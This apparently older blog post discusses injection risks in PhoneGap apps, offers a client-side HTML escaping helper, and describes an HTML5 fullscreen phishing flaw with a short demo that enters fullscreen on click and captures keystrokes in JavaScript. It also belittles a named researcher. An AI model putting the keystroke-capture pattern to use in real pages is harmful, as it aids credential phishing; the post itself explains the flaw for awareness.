PhoneGap (Cordova) has a mechanism to whitelist remote hosts, which is really only effective on iOS. It adds a little bit of security, but many apps use a wildcard “*” to allow all hosts anyway. The wildcard is used by default in the PhoneGap cloud service (a SaaS solution for building PhoneGap apps).

As you can see, the options for an attacker are enormous; all it takes is one vector of injection, and there is an open path (no pun intended) to take over all of the devices of all of the users.

HTML5 apps that run inside the mobile browser are also a nice target for injection attacks. Although they lack most of the native API, there is still access to location in all mobile browsers. It’s less powerful for the attacker, since the browser prompts the user far more vigorously.
The Dolphin mobile browser, for example, implements the full PhoneGap native API (which is generally a good thing), but it makes in-the-browser websites and apps more exposed to attacks.

So what to do, then?!
– Sanitize, sanitize, sanitize all user input, server and client!
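A minimal sketch of what that means on the client side (hypothetical helper; on the server, use your framework’s own escaping tools):

    // Escape user input before it ever reaches innerHTML:
    function escapeHTML(str) {
      return String(str)
        .replace(/&/g, '&amp;')
        .replace(/</g, '&lt;')
        .replace(/>/g, '&gt;')
        .replace(/"/g, '&quot;')
        .replace(/'/g, '&#39;');
    }

    // Better yet, avoid innerHTML for untrusted strings altogether:
    var el = document.getElementById('alarmName'); // hypothetical element
    el.textContent = userInput;                    // never el.innerHTML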

Say What, Flash is More Secure Than HTML5?!

So my favorite script kiddie and copycat, Feross (note the shameless “I discovered” in his Quora post, LoL), found a social-engineering flaw in the HTML5 fullscreen mode that can be used for phishing attacks. This time it might even be his own finding… what do you know 😉

This flaw is very similar to the well-known and very old picture-in-picture attack:
Picture-in-Picture Phishing Attacks and Operating System Styles
More info..
IMHO, the old version is still way more dangerous for phishing.

So how is Flash more secure?

What enables this HTML5 fullscreen flaw to thrive is the fact that you have full keyboard access. This way an attacker can more easily steal the user’s credentials.
After all, fullscreen has existed in Flash for many years now, yet it was never compromised this way. The main reason Flash is more secure is that it does not allow full keyboard interaction in fullscreen.

Good thinking, Adobe, taking care of our security… oh wait… this feature was added to Flash in version 11.3… after all, Flash can’t be left behind…
Working demo…

Damn… but still, Flash gives you a decent popup confirmation, which HTML5 doesn’t.

Yeah, I know Chrome gives you a popup too, but you don’t have to click on it to get FULL keyboard access.
I constructed this “amazing” demo here (Chrome only); as you can see, you get the message, but the keyboard is fully functional and accessible through JavaScript.
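The demo boils down to something like this (a sketch; vendor prefixes as of the time of writing):

    // One click anywhere flips the page to fullscreen...
    document.onclick = function () {
      var el = document.documentElement;
      (el.requestFullscreen || el.webkitRequestFullscreen ||
       el.mozRequestFullScreen).call(el);
    };
    // ...and the keyboard stays fully scriptable, no extra consent click:
    document.addEventListener('keydown', function (e) {
      console.log('captured key code:', e.keyCode);
    });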

So Flash is still more secure than HTML5 – in that respect.

It takes us back to what I and others were preaching about: with great power comes great responsibility.
HTML5 has its own flaws, and the more powerful it becomes, the more it will get.

Stay tuned…